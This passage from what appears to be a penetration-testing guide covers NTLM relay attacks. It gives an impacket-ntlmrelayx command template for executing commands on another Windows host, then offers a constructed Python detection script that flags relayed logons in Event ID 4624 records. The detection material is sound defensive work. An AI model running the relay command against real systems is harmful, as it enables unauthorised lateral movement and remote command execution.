If you are unable to crack the NTLM hash, you can try to relay the authentication to another system instead. A user on one machine might be a local administrator on another; if so, commands can be run on that machine (no UAC confirmation required).
sudo impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_RETRANSMISSION> -c "<COMMAND_TO_EXECUTE_ON_TARGET>"
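
On the detection side, a relayed logon appears on the target as an NTLM network logon (Event ID 4624, logon type 3) whose `WorkstationName` is the original client while `IpAddress` belongs to the relaying host. The Python check below is an added example, not part of the original page; the inventory, host names, addresses and events are constructed, and having a workstation-to-IP inventory is an assumption.

```python
"""Flag NTLM network logons whose claimed workstation does not match the source IP."""

# Constructed asset inventory (assumption): workstation name -> its known IPs.
INVENTORY = {"WKS-ALICE": {"10.0.0.21"}, "WKS-BOB": {"10.0.0.22"}}


def ev(computer, package, user, workstation, ip):
    """Build a constructed 4624 record with only the fields this check reads."""
    return {"EventID": 4624, "LogonType": 3, "Computer": computer,
            "AuthenticationPackageName": package, "TargetUserName": user,
            "WorkstationName": workstation, "IpAddress": ip}


# Constructed sample events, not taken from a real log.
EVENTS = [
    ev("SRV-FILE", "NTLM", "alice", "WKS-ALICE", "10.0.0.21"),   # direct logon
    ev("SRV-APP", "NTLM", "alice", "WKS-ALICE", "10.0.0.66"),    # name/IP disagree
    ev("SRV-APP", "Kerberos", "bob", "-", "10.0.0.22"),          # not NTLM
    ev("SRV-APP", "NTLM", "carol", "WKS-UNKNOWN", "10.0.0.30"),  # not in inventory
]


def classify(event, inventory):
    """Return 'ok', 'mismatch', 'unknown-host', or None when out of scope."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return None
    if event.get("AuthenticationPackageName", "").strip().upper() != "NTLM":
        return None
    name = event.get("WorkstationName", "").strip().upper()
    known_ips = inventory.get(name)
    if known_ips is None:
        return "unknown-host"  # cannot judge; review separately
    return "ok" if event.get("IpAddress") in known_ips else "mismatch"


def find_suspect_logons(events, inventory):
    """Return (target, user, claimed workstation, source IP) for each mismatch."""
    return [(e["Computer"], e["TargetUserName"], e["WorkstationName"], e["IpAddress"])
            for e in events if classify(e, inventory) == "mismatch"]


if __name__ == "__main__":
    for hit in find_suspect_logons(EVENTS, INVENTORY):
        print("possible relayed NTLM logon:", hit)
```

A mismatch is a lead rather than proof: NAT, VPN address pools and stale inventory data produce the same pattern.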